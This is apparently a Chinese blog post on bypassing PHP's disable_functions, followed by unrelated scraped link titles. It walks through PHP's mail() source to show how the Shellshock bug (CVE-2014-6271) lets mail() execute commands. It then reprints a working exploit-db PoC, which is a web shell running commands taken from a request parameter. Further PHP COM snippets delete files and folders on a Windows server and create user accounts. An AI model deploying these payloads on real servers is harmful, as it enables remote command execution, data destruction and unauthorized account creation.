先简单说一下php调用mail()函数的过程。
看到源码ext/mail.c

236行:

char *sendmail_path = INI_STR("sendmail_path");

char *sendmail_cmd = NULL;

从INI中获得sendmail_path变量。我们看看php.ini里是怎么说明的:

; For Unix only.  You may supply arguments as well (default: "sendmail -t -i").

;sendmail_path =

注释中可以看到,send_mail默认值为"sendmail -t -i".

extra_cmd(用户传入的一些额外参数)存在的时候,调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。

如下:

if (!sendmail_path) {

#if (defined PHP_WIN32 || defined NETWARE)

    /* handle old style win smtp sending */

    if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {

      if (tsm_errmsg) {

        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);

        efree(tsm_errmsg);

      } else {

        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));

      }

      MAIL_RET(0);

    }

    MAIL_RET(1);

#else

    MAIL_RET(0);

#endif

  }

  if (extra_cmd != NULL) {

    spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);

  } else {

    sendmail_cmd = sendmail_path;

  }

之后执行:

#ifdef PHP_WIN32

  sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);

#else

  /* Since popen() doesn't indicate if the internal fork() doesn't work

   * (e.g. the shell can't be executed) we explicitly set it to 0 to be

   * sure we don't catch any older errno value. */

  errno = 0;

  sendmail = popen(sendmail_cmd, "w");

#endif

将sendmail_cmd丢给popen执行。
如果系统默认sh是bash,popen就会丢给bash执行。而之前的bash破壳(CVE-2014-6271)漏洞,直接导致我们可以利用mail()函数执行任意命令,绕过disable_functions。

影响版本:php 各版本

修复方法:修复CVE-2014-6271

给出POC(http://www.exploit-db.com/exploits/35146/)如下:

<?php

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)

# Google Dork: none

# Date: 10/31/2014

# Exploit Author: Ryan King (Starfall)

# Vendor Homepage: http://php.net

# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror

# Version: 5.* (tested on 5.6.2)

# Tested on: Debian 7 and CentOS 5 and 6

# CVE: CVE-2014-6271

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283

   $tmp = tempnam(".","data");

   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");

   // In Safe Mode, the user may only alter environment variableswhose names

   // begin with the prefixes supplied by this directive.

   // By default, users will only be able to set environment variablesthat

   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,

   // PHP will let the user modify ANY environment variable!

   mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallysend any mail

   $output = @file_get_contents($tmp);

   @unlink($tmp);

   if($output != "") return $output;

   else return "No output, or not vuln.";

}

echo shellshock($_REQUEST["cmd"]);

?>

<?php

$mPath = str_repeat(“..”,20);

$FSOdelFile = new COM(‘Scripting.FileSystemObject’);

//利用了wshom.ocx

$FSOdelFile->DeleteFile($mPath.”.*.dat”, True);

//删除C区根目录的所有dat文件?>

wshom.ocx中的DeleteFolder

利用这个函数可以删除服务器上的文件夹,很恐怖哦。测试代码如下:

<?php

$mPath = str_repeat(“..”,20);

$FSOdelFolder = new COM(‘Scripting.FileSystemObject’);

//使用wshom.ocx

$FSOdelFolder->DeleteFolder($mPath.”.11″, True);

//删除特定的文件夹

?>

访问之后,成功删除了c:11这个文件夹。

shgina.dll中Create函数创建账户

这个漏洞的测试代码如下:

<?php

$user = new COM(‘{60664CAF-AF0D-0004-A300-5C7D25FF22A0}’);

//利用shgina.dll$user->Create(“asd”);

//创建账户asd

?>

PHP Execute Command Bypass Disable_functions的更多相关文章

  1. ODOO-10.0 错误 Could not execute command 'lessc'

    2017-01-05 20:24:12,473 4652 INFO None odoo.service.db: Create database `hello`. 2017-01-05 20:24:16 ...

  2. VS2010提示error TRK0002: Failed to execute command解决方法

    昨天windows8自动更新Microsoft .NET Framework 3.5和4.5.1安全更新程序,今天用VS2010编译时提示如下错误信息 TRACKER : error TRK0002: ...

  3. Failed to execute command: ""C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Bin\ResGen.exe" 的一个解决办法

    最近在做wpf项目,期间下了一些源码参考,但是在build时经常遇到下面这种bug: Error 2 Failed to execute command: ""C:\Program ...

  4. Node.js log2: ERR when execute command >npm install

    1.Node.js创建项目 项目microblog创建成功,提示:cd  microblog& npm install 项目创建完成时的目录如下图所示: 2.Node.js错误 如题所言: E ...

  5. VS2010提示error TRK0002: Failed to execute command

    转自VC错误:http://www.vcerror.com/?p=277 问题描述: windows8自动更新Microsoft .NET Framework 3.5和4.5.1安全更新程序,今天用V ...

  6. Unable to execute command or shell on remote system: Failed to Execute process

    1.问题描述 先说下我的项目环境:jenkins部署在windows下面,项目部署也是在windows下面,ssh服务器是FreeSSHd,原来是打算用Send files or execute co ...

  7. shell function/for in/for (())/string concat/has dir/rename using regex/if(())/exit/execute command and pass value to variable/execute python

    #!/bin/bash #remove the MER.*_ in file name for all the files in a dir function getdir(){ for elemen ...

  8. 安装Odoo9出现的could not execute command "lessc"问题

    解决方案: apt-get install node-less

  9. 9.0 alpha 版安装出现 could not execute command lessc 的问题

    解决方案: apt-get install node-less

随机推荐

  1. ecshop设置一个子类对应多个父类并指定跳转url的修改方法

    这是一篇记录在日记里面的技术文档,其实是对ecshop的二次开发.主要作用是将一个子类对应多个父类,并指定条跳转url的功能.ecshop是一款在线购物网站,感兴趣的可以下载源码看看.我们看看具体是怎 ...

  2. oracle的数据库,随笔

    不多说,看代码 select b.*,a.kscj,a.paiming from (select t.kch,t.kcm,t.kscj,t.xh,        rank() over (order ...

  3. C++多线程下的单例模式

    一.懒汉模式:即第一次调用该类实例的时候才产生一个新的该类实例,并在以后仅返回此实例. 需要用锁,来保证其线程安全性:原因:多个线程可能进入判断是否已经存在实例的if语句,从而non thread s ...

  4. Linux中信号量处理

    参考文章: http://blog.csdn.net/qinxiongxu/article/details/7830537/ 信号量一. 什么是信号量信号量的使用主要是用来保护共享资源,使得资源在一个 ...

  5. div img居中的方式

    想让div中的img水平和垂直都居中,可以将img放在div中,img的样式:height:100%;width:100%; 外部定义div的宽度和高度,然后定义line-height行高,div外部 ...

  6. DRF如何序列化外键的字段

    我觉得在有些应用场景下,这个操作是有用的,因为可以减少一个AJAX的请求,以增加性能. 当然,是二次请求,还是一次传输.这即要考虑用户体验,还要兼顾服务器性能. 一切是有条件的平衡吧.就算是一次传输, ...

  7. hdu 1012:u Calculate e(数学题,水题)

    u Calculate e Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others)Tot ...

  8. 记VS2013并行编译导致出错的解决过程

    接前一篇,电脑换了新的,系统是64bit的win8系统,先安装了SQLServer2012,再安装VS2010旗舰版,Stop!为什么还是2010?因为2010太经典了,以至于公司的项目还在用它写项目 ...

  9. poj 1811 大数分解

    模板 #include<stdio.h> #include<string.h> #include<stdlib.h> #include<time.h> ...

  10. tcp的三次握手及四次挥手(连接与中断流程)

    连接的三次握手: 1握.client向server发送连接请求,发送的报文是:syn=1,seq number=生成的随机数x .  这时client的状态是SYN_SEND 2握.server从sy ...